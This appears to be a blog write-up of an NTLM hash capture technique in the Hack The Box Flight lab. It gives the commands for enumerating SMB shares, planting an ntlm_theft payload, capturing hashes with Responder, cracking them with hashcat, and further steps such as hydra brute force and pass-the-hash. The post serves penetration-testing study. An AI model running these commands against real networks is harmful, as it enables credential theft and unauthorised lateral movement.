Capturing NTLM Hashes in Hack The Box Flight Lab

By /

Listen to this Post

2025-02-07

Discovered an Interesting NTLM Hash Capture Technique in Hack The Box Flight Lab!

While working on the Hack The Box Flight lab, I found an interesting way to capture NTLM hashes by exploiting shared folder permissions.

Approach:

  1. Identified a shared folder where a user had read/write access.

2. Crafted a payload using the `ntlm_theft` tool.

3. Uploaded the payload to the shared folder.

4. Started Responder to intercept authentication requests.

  1. Successfully captured the NTLM hash of the user, opening doors for further post-exploitation steps.

Commands and Codes:

1. Identify Shared Folders:

smbclient -L //<target_ip> -U <username>

2. Craft Payload with `ntlm_theft`:

python3 ntlm_theft.py -o payload.html

3. Upload Payload to Shared Folder:

smbclient //<target_ip>/<share_name> -U <username> -c 'put payload.html'

4. Start Responder to Capture NTLM Hashes:

sudo responder -I eth0 -wrf

5. Crack NTLM Hash with Hashcat:

hashcat -m 5600 -a 0 captured_ntlm_hash.txt /path/to/wordlist.txt

What Undercode Say:

In the realm of cybersecurity, capturing NTLM hashes is a critical step in lateral movement within a network. The technique demonstrated in the Hack The Box Flight lab showcases how shared folder permissions can be exploited to capture these hashes. By using tools like `ntlm_theft` and Responder, we can intercept authentication requests and capture NTLM hashes, which can then be cracked using tools like Hashcat.

This method is particularly useful in red team engagements where gaining access to user credentials is essential for further exploitation. The use of shared folders as an attack vector is a common tactic, and understanding how to exploit these vulnerabilities is crucial for any penetration tester.

In addition to the tools mentioned, there are several other commands and techniques that can be employed in similar scenarios:

  • Enumerate SMB Shares:
    nmap --script smb-enum-shares -p 445 <target_ip>

  • Brute Force SMB Login:

    hydra -L userlist.txt -P passlist.txt smb://<target_ip>

  • Capture NTLMv2 Hashes with Metasploit:

    use auxiliary/server/capture/smb
set SRVHOST <your_ip>
run

  • Analyze Captured Hashes:

    john --format=netntlmv2 captured_hashes.txt

  • Exploit Pass-the-Hash:

    pth-winexe -U <username>%<ntlm_hash> //<target_ip> cmd

Understanding these commands and techniques is essential for any cybersecurity professional. The ability to capture and exploit NTLM hashes can provide a significant advantage in both offensive and defensive security operations.

For further reading and resources, consider the following URLs:
Hack The Box
Responder GitHub Repository
Hashcat Official Site
NTLM Theft Tool

By mastering these tools and techniques, you can enhance your skills in ethical hacking and penetration testing, making you a more effective cybersecurity professional.

References:

Hackers Feeds, Undercode AIFeatured Image

Related Posts: